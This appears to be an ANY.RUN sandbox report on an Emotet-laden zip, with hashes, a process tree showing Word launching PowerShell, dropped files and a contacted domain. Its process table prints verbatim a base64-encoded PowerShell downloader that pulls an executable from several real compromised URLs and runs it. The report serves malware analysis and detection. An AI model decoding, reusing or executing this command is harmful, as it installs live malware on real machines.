File name: | sample.zip |
Full analysis: | https://app.any.run/tasks/fd729e81-22e5-4de1-a23a-2a0f2497ebae |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | October 14, 2019, 15:20:33 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
MIME: | application/zip |
File info: | Zip archive data, at least v2.0 to extract |
MD5: | E0BAAF15FF9ABA4CCACC7901461A7B7D |
SHA1: | 43A91D452F6BE306CFB1F0C0C0710C775780991C |
SHA256: | 785A7393000AEA7B7F5E252E9DC22936666853C38B2BB34C92530095D45CD16C |
SSDEEP: | 3072:R8BZjyqMxwEQkPSMc9eva6ziHeGVp6meADYEX1ZYIG0VM8t:R8B5BMfIoaNRVgWDTX1ZbG4 |
.zip | | | ZIP compressed archive (100) |
---|
ZipRequiredVersion: | 788 |
---|---|
ZipBitFlag: | 0x0001 |
ZipCompression: | Deflated |
ZipModifyDate: | 2019:10:14 15:20:03 |
ZipCRC: | 0x5e240e69 |
ZipCompressedSize: | 166608 |
ZipUncompressedSize: | 280064 |
ZipFileName: | 39b828dfbbee573d93584d84c0ed2e9bfac65f44d9acab1a97bd052bd0e5b7b6.bin |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2104 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\sample.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Version: 5.60.0 | ||||
3012 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\papajohns.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2064 | powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABiADMAMAAyAGIAMwA4ADAANwAwADAANgA9ACcAYwAwADAAMAAwADgAMwBjAGMAMwAwACcAOwAkAGIANQAyADAAOQAzADIAMAA3ADcAMAAwACAAPQAgACcANQAyADAAJwA7ACQAYgA0ADgAOAAzADUAYgA5ADAAMwAwAD0AJwBiADAANgBiAGMAeAAyADAANwA3ADAAMAB4ACcAOwAkAHgAMABjAHgANAA1AHgAMAA0AHgAOAA4AHgAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAGIANQAyADAAOQAzADIAMAA3ADcAMAAwACsAJwAuAGUAeABlACcAOwAkAHgANgA0ADcANgA1ADMAMQBiADEAYwA9ACcAeABjADgAMAA4ADAAMAAzADcAMQA5ADUANwAnADsAJABjADcAYgA0ADMAMgA2ADkAOQAxADEANwBiAD0AJgAoACcAbgBlAHcALQBvAGIAJwArACcAagBlAGMAJwArACcAdAAnACkAIABOAGUAVAAuAHcARQBCAGMAbABpAEUATgBUADsAJABjADkAMQAwAHgANQA3AGIAOABjADMAPQAnAGgAdAB0AHAAcwA6AC8ALwB0AG8AbgBnAGQAbwBnAGkAYQByAGUALgBjAG8AbQAvAGkAYgBrAHMAbABxAGsAMQBsAGYALwBmAHAAbQBmADEAXwB3AHoAMwBzAHIALQA4ADcANQAwADEANAAwADYANwAvAEAAaAB0AHQAcABzADoALwAvAGUAZwB5AGEAbgBwAHUAbABzAGUALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGkAMQBuAHoAXwB1AGEAdABhADAAMwAzADUAYQAtADYALwBAAGgAdAB0AHAAcwA6AC8ALwBzAHAAYQBjAGUANABwAHIAbwBtAG8AdABpAG8AbgBzAC4AYwBvAG0ALwBhAHMAcwBlAHQAcwAvAHUAcABsAG8AYQBkAHMALwBhAGgAbgB4AFIARwByAHkALwBAAGgAdAB0AHAAOgAvAC8AMQAwADAAMABhAHQAYQBwAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AdQBwAGwAbwBhAGQAcwAvADAAZwA3AGMAXwB0AGUANgBqAGoAYgBtAGMALQAxADYALwBAAGgAdAB0AHAAOgAvAC8AYQBjAGEAZABlAG0AaQBhAC4AcwBwAHIAaQBuAHQANwAuAG4AZQB0AC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAE8ASABLAGQATQBmAFkAdgB1AC8AJwAuACIAUwBQAGAATABpAFQAIgAoACcAQAAnACkAOwAkAGMAOAA5ADMANAAwADYAMgAwADIANwAxAGMAPQAnAGMAMAAxADIAMAA1ADAAeAAzAGIAMgAwACcAOwBmAG8AcgBlAGEAYwBoACgAJABiADAAOAA3ADAAMgAwADAANwA0ADMAIABpAG4AIAAkAGMAOQAxADAAeAA1ADcAYgA4AGMAMwApAHsAdAByAHkAewAkAGMANwBiADQAMwAyADYAOQA5ADEAMQA3AGIALgAiAGQAbwB3AGAATgBMAG8AQQBkAGAARgBpAGwARQAiACgAJABiADAAOAA3ADAAMgAwADAANwA0ADMALAAgACQAeAAwAGMAeAA0ADUAeAAwADQAeAA4ADgAeAApADsAJABjAGMAMAAyADMANAA1ADYAMAA1AGIAPQAnAGMAOABiADkANwA4ADEAMwA5ADIAMgA0ADUAJwA7AEkAZgAgACgAKAAuACgAJwBHACcAKwAnAGUAdAAtACcAKwAnAEkAdABlAG0AJwApACAAJAB4ADAAYwB4ADQANQB4ADAANAB4ADgAOAB4ACkALgAiAEwAZQBOAEcAYABUAEgAIgAgAC0AZwBlACAAMwA3ADEAMAA1ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAFMAVABgAEEAUgBUACIAKAAkAHgAMABjAHgANAA1AHgAMAA0AHgAOAA4AHgAKQA7ACQAeABiADAAMAB4AGMAYwA4ADAAMAAyADAAPQAnAGMAMQAyADgAMQAzADIANAA4ADEAMwAnADsAYgByAGUAYQBrADsAJABjADgAMAAwADYAMABjADgANABiADcAPQAnAGIANAAwADAANAAyADAANwA2AGIAYgAwACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAHgAMAA0ADAAOABiAGMAMgAwAHgAMAA9ACcAeAA1ADMAYgA4ADAANwAwADAAOAAwACcA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3012 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR2159.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2064 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Z5XHP0OQQF4RQYA731J7.temp | — | |
MD5:— | SHA256:— | |||
3012 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:1758F84A3F62413C7517AC6E872C99E9 | SHA256:D61076D52014648BC5C9A8A77119F576836A83E788C834086572581A1908F908 | |||
3012 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C9B04D17.wmf | wmf | |
MD5:1BFE099A90FAB05C195222CD14B04102 | SHA256:A6D1EDEF80BB10701BF1B2F2340A4A899C4CBC6FCDA894B1A75F7271FFE9D305 | |||
3012 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2DD168D9.wmf | wmf | |
MD5:26456A5B0F195CBF1182E6310ED4B97C | SHA256:AFEBC2496C157D8462F7A849721C959D303DCE7A4B931927993524A0C1E3BD73 | |||
3012 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4B2FEE38.wmf | wmf | |
MD5:7336E71E93A1B0BFA6901D91FAA547C8 | SHA256:4383262EF326FE758DA53407048F353265D86D1B14B70E74F19ACD45AEC5450E | |||
2104 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRb2104.45929\39b828dfbbee573d93584d84c0ed2e9bfac65f44d9acab1a97bd052bd0e5b7b6.bin | document | |
MD5:FEC4795055DE05BA9B434BCF5F372E19 | SHA256:39B828DFBBEE573D93584D84C0ED2E9BFAC65F44D9ACAB1A97BD052BD0E5B7B6 | |||
3012 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\166AE1EE.wmf | wmf | |
MD5:34ED6F7A829314D7BDB154AD22EC92AF | SHA256:28DAC4CED4FE090DF96FDCCC4A579DA28D2F5C2A76DA37E14B92AC4CDBAC6CC2 | |||
3012 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6F388E3D.wmf | wmf | |
MD5:60EBC56D56472CA242A746C96EC337EB | SHA256:4FC019E24824CAC6246AEAD69E56002EF20EED33A5DF8EDD551BCE02334CE9E9 | |||
3012 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D3495361.wmf | wmf | |
MD5:0D1C5E4D9DE440BF2991A05E04577B97 | SHA256:6199B78311078F8CF0AFDEA6AB23E83E50967E7ADE60C5E7B6622098837FFE48 |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
— | — | 172.104.51.209:443 | tongdogiare.com | Linode, LLC | SG | unknown |
Domain | IP | Reputation |
---|---|---|
tongdogiare.com |
| unknown |